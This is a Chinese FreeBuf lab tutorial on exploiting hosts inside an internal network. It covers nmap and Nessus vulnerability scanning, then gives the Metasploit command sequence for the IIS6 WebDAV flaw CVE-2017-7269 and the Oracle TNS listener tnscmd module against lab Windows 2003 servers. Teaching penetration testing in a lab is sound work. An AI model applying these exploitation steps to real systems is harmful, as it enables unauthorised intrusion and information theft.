freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透漏洞利用
2019-01-19 21:23:11

查找漏洞信息并利用

我们在收集到漏洞信息以及服务器信息后,要在内网其他机器进行主机漏洞发现,并占据主机控制权限。首先我们要获取到主机的相关漏洞信息,可以通过nmap进行主机漏洞信息及版本探测。

实验环境:

虚拟攻击机:kali linux/10.10.10.138

虚拟被攻击服务器:windows2003/10.10.10.130和10.10.10.129

命令:nmap -- script nmap-vulners –sV <目标IP>

图片.png图片.png在找到端口服务版本以及其包含的漏洞信息后,我们可以尝试进行查找漏洞相关信息,看能否利用。

同时可以通过nessus进行端口扫描以及主机漏洞探查。

图片.png

例如:发现主机10.10.10.130主机为IIS6.0服务器,存在CVE-2017-7269漏洞。下面以该漏洞为实例进行利用

图片.png在metaspolit中iis_webdav_scstoragepathfromurl.rb模块可以进行IIS6_WebDAV远程代码执行漏洞利用。或者下载CVE2017-7269利用POC,将其存放到metaspolit模块下。我的模块路径在/opt/metasploit-framework/embedded/framework/modules/下。

Kali下首先启用metasploit:

命令:msfconsole

查找相关模块:

命令:search CVE2017-7269

使用CVE2017-7269 POC信息进行配置:

命令:use exploit/windows/iis/CVE2017-7269

如图所示:

图片.png使用set配置相关参数列表:

set RHOST 10.10.10.130(目的IP)

set LHOST 10.10.10.138(本机IP)

图片.png使用exploit执行,如图,没有session被创建后尝试利用其他漏洞。

尝试利用其他漏洞信息。

在nessus上发现有oracleTNS信息泄露。

图片.png尝试利用oracle TNS Listener Command Issuer

使用kali下输入命令msfconsole进入metasploit控制台,通过search查找oracle漏洞利用tnscmd,如图:进行配置

图片.png设置目标地址:

图片.png执行结果如下:

图片.png成功获取到目标信息。



# 内网渗透 # 漏洞利用
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者